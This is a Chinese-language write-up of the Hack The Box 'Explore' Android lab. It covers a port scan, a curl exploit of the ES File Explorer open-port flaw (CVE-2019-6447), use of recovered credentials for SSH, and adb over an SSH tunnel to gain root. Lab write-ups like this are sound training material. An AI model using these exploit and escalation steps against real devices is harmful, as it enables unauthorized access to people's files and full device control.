基本信息
data:image/s3,"s3://crabby-images/234b1/234b12966776ac8f2e2f5c762fa87e23cdd3553f" alt=""
端口扫描
应该是HTB第一台Android靶机,需要全端口扫描:
1 | nmap -p- 10.10.10.247 |
59777
直接访问是禁止目录列举:
data:image/s3,"s3://crabby-images/5735a/5735a6180cb4d589b5954e761d3b7b843e677128" alt=""
ES File Explorer
直接搜索android 59777,可以发现是ES File Explorer:
- Android file manager app exposing user data through open port | The Daily Swig
https://portswigger.net/daily-swig/android-file-manager-app-exposing-user-data-through-open-port - fs0c131y/ESFileExplorerOpenPortVuln: ES File Explorer Open Port Vulnerability - CVE-2019-6447
https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
1 | curl --header "Content-Type: application/json" --request POST --data '{"command":"[my_awesome_cmd]"}' http://192.168.0.8:59777 |
data:image/s3,"s3://crabby-images/d352a/d352abcbc49216df3b6f7aa718fe5b8e2f04a08f" alt=""
user flag
sdcard目录下发现user.txt,直接访问即可:
data:image/s3,"s3://crabby-images/8d282/8d2826f0a3a866b2913c430eb369772ab38b5837" alt=""
Creds信息
DCIM里有个creds.jpg:
1 | kristi |
data:image/s3,"s3://crabby-images/506df/506df9c329548ee571cd099cf3d9ebbfbb691121" alt=""
data:image/s3,"s3://crabby-images/20ed4/20ed475c8a0dc2091244d17e1e9ef727e135c18a" alt=""
这个账号密码可以ssh登录:
data:image/s3,"s3://crabby-images/bc849/bc849ccc2fe753b6db733636ed1608a0ea7412b6" alt=""
adb & root flag
端口扫描发现5555被过滤,可以通过ssh端口转发后adb连接,能直接su:
1 | ssh -L 5555:127.0.0.1:5555 kristi@10.10.10.247 -p 2222 |
data:image/s3,"s3://crabby-images/a2967/a296738624d546090e7da4b2db407b41b0284cbc" alt=""
root flag
data:image/s3,"s3://crabby-images/0e654/0e65472a5841488acc52cd7f4280d4bd4fe10711" alt=""
参考资料
- Android file manager app exposing user data through open port | The Daily Swig
https://portswigger.net/daily-swig/android-file-manager-app-exposing-user-data-through-open-port - fs0c131y/ESFileExplorerOpenPortVuln: ES File Explorer Open Port Vulnerability - CVE-2019-6447
https://github.com/fs0c131y/ESFileExplorerOpenPortVuln - Hack the box — Explore. Types of OS : Android | by 0xr2d2 | Jun, 2021 | Medium
https://0xr2d2.medium.com/explore-hack-the-box-bd93468b70f9